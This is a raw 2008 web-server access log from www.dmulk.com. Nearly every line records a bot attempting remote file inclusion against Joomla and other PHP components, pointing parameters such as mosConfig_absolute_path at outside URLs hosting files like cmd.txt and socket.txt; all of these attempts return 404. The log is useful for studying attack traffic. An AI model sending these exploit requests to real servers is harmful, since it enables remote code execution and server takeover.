66.51.108.62 - - [18/Jan/2008:21:13:52 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.140.234.80 - - [18/Jan/2008:21:13:53 -0800] "GET /logs/access.log/index.php?redir=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.140.234.80 - - [18/Jan/2008:21:13:54 -0800] "GET /logs/index.php?redir=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.140.234.80 - - [18/Jan/2008:21:14:09 -0800] "GET /logs/access_080101.log/index.php?redir=http://nkdb.org//AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.157.77 - - [18/Jan/2008:21:14:16 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:21:14:32 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.38.10.218 - - [18/Jan/2008:21:14:33 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://bkk1.serversiam.com/~svsyn/socket.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:21:15:43 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.31.130 - - [18/Jan/2008:21:15:44 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.31.130 - - [18/Jan/2008:21:15:44 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:21:15:44 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:21:15:45 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:21:15:46 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.107.20 - - [18/Jan/2008:21:15:54 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.e-sempione.org/z.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.18.107.20 - - [18/Jan/2008:21:15:54 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.e-sempione.org/z.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:21:15:57 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.32 - - [18/Jan/2008:21:16:28 -0800] "GET /logs/?S=D HTTP/1.0" 200 30666 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:21:20:20 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.28 - - [18/Jan/2008:21:20:21 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.sonoraautoboutique.com.mx/aviso/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.72.10 - - [18/Jan/2008:21:20:30 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.72.10 - - [18/Jan/2008:21:20:30 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.72.10 - - [18/Jan/2008:21:20:31 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [18/Jan/2008:21:20:43 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [18/Jan/2008:21:20:43 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [18/Jan/2008:21:20:43 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [18/Jan/2008:21:21:53 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [18/Jan/2008:21:21:53 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.19.17 - - [18/Jan/2008:21:21:53 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:21:25:26 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [18/Jan/2008:21:25:27 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://vulnerable.we.bs/files/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.231.1.48 - - [18/Jan/2008:21:28:02 -0800] "GET /logs/access_071229.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.244.8 - - [18/Jan/2008:21:28:42 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.219.244.8 - - [18/Jan/2008:21:28:43 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.219.244.8 - - [18/Jan/2008:21:28:43 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.247.72.10 - - [18/Jan/2008:21:28:44 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.74.90 - - [18/Jan/2008:21:28:50 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:21:28:56 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:21:28:57 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:21:28:57 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.249.19.17 - - [18/Jan/2008:21:29:34 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [18/Jan/2008:21:29:34 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.234.108.168 - - [18/Jan/2008:21:29:44 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.handicap.pevg.de/images/help.png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:21:29:58 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:21:29:58 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [18/Jan/2008:21:30:26 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [18/Jan/2008:21:30:26 -0800] "GET //myevent.php?myevent_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
90.156.145.60 - - [18/Jan/2008:21:30:26 -0800] "GET /logs//myevent.php?myevent_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [18/Jan/2008:21:31:07 -0800] "GET /index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.67.80.180 - - [18/Jan/2008:21:31:33 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.67.80.180 - - [18/Jan/2008:21:31:33 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.67.80.180 - - [18/Jan/2008:21:31:33 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.106.19.18 - - [18/Jan/2008:21:33:35 -0800] "GET /logs/access_080101.log/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [18/Jan/2008:21:33:35 -0800] "GET /logs/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.18 - - [18/Jan/2008:21:34:33 -0800] "GET /logs/access.log/index.php?redir=http://txfishes.com/wikispecies/img/wiki/goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:35:52 -0800] "GET /logs/access_071230.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:35:52 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:35:52 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.56 - - [18/Jan/2008:21:37:44 -0800] "GET /common/func.php?CommonAbsDir=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
80.67.19.56 - - [18/Jan/2008:21:37:44 -0800] "GET /logs/common/func.php?CommonAbsDir=http://www.coimbranight.net/web/jim1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
193.142.215.57 - - [18/Jan/2008:21:37:45 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.142.215.57 - - [18/Jan/2008:21:37:46 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.142.215.57 - - [18/Jan/2008:21:37:46 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.22.250 - - [18/Jan/2008:21:37:57 -0800] "GET /common/func.php?CommonAbsDir=http://www.coimbranight.net/web/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.38.22.250 - - [18/Jan/2008:21:37:57 -0800] "GET /logs/common/func.php?CommonAbsDir=http://www.coimbranight.net/web/jim??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:21:38:04 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.48.17 - - [18/Jan/2008:21:38:07 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.terrazap.com/members/skin/cmdtotal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:38:18 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:21:38:25 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.219.244.8 - - [18/Jan/2008:21:38:32 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:38:32 -0800] "GET /logs/access_071229.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:38:32 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:38:32 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.19.169 - - [18/Jan/2008:21:39:02 -0800] "GET /funny/?M=A HTTP/1.0" 200 796 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:39:14 -0800] "GET /logs/access_071224.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:39:14 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:39:14 -0800] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:39:22 -0800] "GET /logs/access_071224.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:39:22 -0800] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:39:22 -0800] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.92.23.94 - - [18/Jan/2008:21:39:55 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.92.23.94 - - [18/Jan/2008:21:39:55 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
69.9.37.130 - - [18/Jan/2008:21:40:14 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://estatica.com.br/.xpl/mc2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [18/Jan/2008:21:40:14 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://estatica.com.br/.xpl/mc2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.9.37.130 - - [18/Jan/2008:21:40:14 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://estatica.com.br/.xpl/mc2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
90.156.145.60 - - [18/Jan/2008:21:41:08 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://asterweb.com.br/cav/s.txt??????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.67.80.180 - - [18/Jan/2008:21:41:46 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [18/Jan/2008:21:41:49 -0800] "GET /logs/access_071228.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [18/Jan/2008:21:41:49 -0800] "GET //myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.177.121 - - [18/Jan/2008:21:41:50 -0800] "GET /logs//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:44:41 -0800] "GET /logs/access.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.87.205.164 - - [18/Jan/2008:21:44:51 -0800] "GET //shoutbox/expanded.php?conf=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
88.87.205.164 - - [18/Jan/2008:21:44:52 -0800] "GET /logs//shoutbox/expanded.php?conf=http://h1.ripway.com/brunoz/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:45:48 -0800] "GET /logs/access_071230.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
146.83.237.67 - - [18/Jan/2008:21:46:02 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
146.83.237.67 - - [18/Jan/2008:21:46:02 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://heartlandcandles.org/cart/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.15.208.23 - - [18/Jan/2008:21:47:21 -0800] "GET /logs/access.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:21:48:06 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:21:48:06 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:21:48:06 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:21:48:40 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:21:48:40 -0800] "GET /config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:21:48:41 -0800] "GET /logs/config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.24.226 - - [18/Jan/2008:21:49:05 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://70.87.62.18/~teamyga/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:21:49:11 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:21:49:57 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:21:49:57 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:21:49:57 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:21:51:15 -0800] "GET /logs/access_071228.log/config.php?path_to_root=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.239.177.121 - - [18/Jan/2008:21:51:50 -0800] "GET /logs/access_071230.log//myevent.php?myevent_path=http://www.asoc-posidonia.es/pr.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:21:52:19 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.91.198.51 - - [18/Jan/2008:21:52:20 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.consultorias.biz/ray/candaops.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
